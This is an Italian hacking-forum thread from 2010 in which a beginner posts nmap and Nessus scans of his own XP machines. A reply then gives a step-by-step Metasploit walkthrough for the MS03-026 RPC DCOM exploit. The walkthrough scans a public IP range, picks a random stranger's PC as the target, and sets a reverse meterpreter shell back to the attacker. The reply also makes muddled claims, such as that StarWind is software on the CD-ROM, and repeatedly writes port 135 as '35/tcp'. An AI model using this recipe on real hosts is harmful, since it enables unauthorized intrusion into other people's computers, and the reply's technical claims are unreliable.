Results 1 to 2 of 2

Thread: Metasploit - Come fare???

  1. #1
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    3

    Default Metasploit - Come fare???

    Ciao a tutti ragazzi!
    Mi stò addentrando da poco tempo nel mondo della sicurezza informatica e chiaramente uso Metasploit. Man mano che vado avanti mi sorgono però spontanee alcune domande e fino ad ora non sono riuscito a trovare nulla in rete che potesse rispondere a questi quesiti.
    So che voi sicuramente saprete darmi le giuste risposte.
    Innanzitutto, una volta che scannerizzo le porte di un indirizzo IP (che chiaramente corrisponde a uno dei miei pc connessi in rete, niente di illegale :-) ) e trovo le porte aperte, come faccio a trovare l'exploit giusto da usare??
    Ad esempio, su un mio computer ho installato Windows XP SP1 e come da tutorial ho utilizzato un exploit contenuto nel framework di Metasploit che sfruttava la porta 445 e ho ottenuto l'accesso alla macchina; ora, quello che mi chiedo è: come si procede nelle varie fasi di attacco ad un sistema? Dove trovo gli exploit giusti da usare? Non credo che la soluzione stia nel provare le infinità di exploit proposti da Metasploit XD.

    Altra questione, dopo aver bucato Windows XP SP1, ho installato su un altro pc connesso in rete Windows XP SP2 e qui le cose cambiano. Nmap mi da questo risultato:

    Code:
    Starting Nmap 5.00 ( http://nmap.org ) at 2010-09-30 10:48 CEST
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
    
    Not shown: 994 closed ports
    PORT     STATE SERVICE
    135/tcp  open  msrpc
    139/tcp  open  netbios-ssn
    445/tcp  open  microsoft-ds
    2869/tcp open  unknown
    3260/tcp open  iscsi
    3261/tcp open  unknown
    Anche in questo caso la porta 445 è aperta ma essendo che Win è patchato non c'è nessuna falla da poter sfruttare, me lo conferma anche Nessus che ha trovato solo 1 vulnerabilità grave, mentre le altre sono lievi. La suddetta vulnerabilità sta nella porta 3261. Di seguito posto ciò che mi dice Nessus:

    Code:
    Synopsis
    The remote service is protected with default credentials.
    
    Description
    The remote StarWind control port is configured to use the default
    credentials to control access.  Knowing these, an attacker can gain
    administrative control of the affected application.
    
    Solution
    Edit the StarWind configuration file and change the login credentials
    in the authentication section.  Then, restart the service to put the
    changes into effect.
    
    Risk Factor
    High
    
    CVSS Base Score
     7.5 (CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)
    
    Plugin Output
    Nessus was able to gain access using the following credentials :
    
      User Name : test
      Password  : test
    
    In addition, it collected the following information about the
    devices on the remote host.
    
      DeviceName="\\.\E:"
      DeviceId="0x89f90"
      DeviceType="SPTI:CD/DVD"
      sessions="1"
      ScsiInquiry=" MATSHITA DVD-RAM UJ-850S 1.61"
      ScsiAdapter="1"
      ScsiBus="0"
      ScsiTarget="0"
      ScsiLun="0"
      BurnerFlags="0x7"
      DeviceName="\\.\F:"
      DeviceId="0x914b8"
      DeviceType="SPTI:CD/DVD"
      sessions="1"
      ScsiInquiry="AXV      CD/DVD-ROM       2.0B"
      
      [0x89f90]: '\\.\E:'
      [0x914b8]: '\\.\F:'
    
    Plugin Publication Date: 2007/12/17
    Le ultime righe, com'è possibile immaginare, riportano le informazioni dell'unità CD/DVD presente sul pc target.
    Se provo ad effettuare una connessione a questa porta ottengo una shell con il seguente output:

    Code:
    StarWind iSCSI Target v2.6.1 (Build 0x20050401, Win32, Alcohol Edition)
    Copyright (c) Rocket Division Software 2003-2005. All rights reserved.
    Da qui deduco che c'è in ascolto l'applicazione StartWind iSCSI Target, però non so come sfruttarla per poter bucare il sistema (ammesso che stia ragionando bene).

    Sapreste darmi una mano per entrambi i miei quesiti?

    Grazie mille!

  2. #2
    Junior Member
    Join Date
    Apr 2010
    Posts
    26

    Default Re: Metasploit - Come fare???

    StartWind iSCSI Target non è una vulnerabilità bensì è il software installato all'interno del CD/DVD-ROM che si riferisce agli anni 2003-2005. Quindi non esiste nessun exploit. Per la prima risposta la vulnerabiltà su cui lavorare è questa: "msrpc" è si trova sulla porta 135/tcp. Noto che hai anche la porta 139 aperta. Chiudila perchè sei facilmente attaccabile con dei programmini che sa usare anche il mio cane. Se non sai come si fa a chiuderla fammelo sapere. Ti spiego, in linea di massima, come si sfrutta questa vulnerabilità. Ti rammento che penetrare nei pc altrui è vietato dalla legge. Questa mia breve spiegazione è soltato a scopo di studio. Iniziamo.
    Attacco alla porta 135 con la Console di Framework versione 2.7
    E’ stato scelto questa versione di Framework perché l’exploit “msrpc_dcom_ms03_026” si trova ancora inserito su questa versione. Essendo un exploit un po’ vecchiotto è stato eliminato nelle versioni successive. Forse perché le versioni di windows sono tutte aggiornate. Da notare che che questa versione non è più inserita nel sito ufficiale di Metasploit Fremework (http://www.metasploit.com). Per trovarla andare su Google e digitare “ Download Framework versione 2.7 In ogni modo questi sono i passaggi per penetrare in un pc con la porta 135/tpc aperta.
    01)Dalla Console di Framework 2.7 digitare il seguente comando “nmap –p 135 87.16.235.1-255” naturalmente senza apici, e premere invio. Lasciare uno spazio vuoto prima di –p prima di 135 e prima di 87.16.235.1 Il numero 135 è la nostra porta, mentre l’IP 87.16.235.1 può variare. Al termine della schermate di nmap compariranno una serie di host con le porte filtrate, chiuse e aperte. Accorre prelevare l’IP con la porta 35/tcp aperta. In genere è scritto così: “135/tcp open msrpc”.
    Questi passaggi si possono fare anche con “nmap” non inserito nella Console 2.7 ma prelevato dal sito ufficiale ” http://nmap.org” Preferisco quest’ultimo perché le porte filtrate, chiuse, e aperte sono colorate ed è facile vedere l’IP che ci interessa perché la porta 35/tpc è di colore verde.
    02)Ritorniamo alla Console 2.7 e scriviamo “show exploits” naturalmente senza apici
    03)Assicuratevi dell’esistenza del nostro exploit cioè “msrc_ms03_026” scritto sulla sinistra della pagina. Mentre sulla stessa riga, sulla destra deve comparire questo “Microsoft RPC DCOM MS03_026”
    04)Al cursore msf> scrivete “135/tpc open msrpc” sempre senza apici e premere invio. La Console 2.7 risponde così: “msfconsole: 135/tpc: command not fount” non date peso a queste risposta. Credo che si possa fare anche a meno di questo passaggio (04)
    05)Al cursore msf> scrivete “show payloads” senza apici e premere invio
    06)Al cursore msf> scrivete “PAYLOAD win32 reverse meterpreter” senza apici e premere invio
    07)Al cursore msf> scrivete “ set LHOST 192.168.1.2” senza apici e premere invio.
    Note: l’IP 192.168.1.2 è l’host locale attaccante e si ricava da questo: andate su Star-->Esegui-->digitare cmd e premere OK. Alla schermata apparsa scrivete ipconfig e dare invio. Dove c’è scritto Indirizzo IP…………….192.168.1.2 è l’host locale attaccante. Il vostro può essere diverso ma non fa nessuna differenza. Andiamo avanti
    08)Al cursore msf> scrivete “set RHOST 87.16.235.235” senza apici. Questo è l’host remote da attaccare. Naturalmente questo IP è variabile a seconda della scansione effettuata con nmap descritta prima di cui avete scelto a caso un PC da attaccare.
    09)Al cursore msf> scrivete “exploit” senza apici e constatare se l’exploit ha avuto effetto.

Similar Threads

  1. come fare a scegliere il tipo di exploit?
    By cesar in forum Discussioni Generali
    Replies: 2
    Last Post: 05-22-2010, 10:16 PM
  2. volevo fare un saluto alla comunità
    By paolom65 in forum Angolo dei Newbie
    Replies: 2
    Last Post: 04-03-2010, 04:50 PM
  3. Niente da fare (installazione bt4)
    By J0k3r_89 in forum Angolo dei Newbie
    Replies: 3
    Last Post: 12-21-2009, 10:28 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •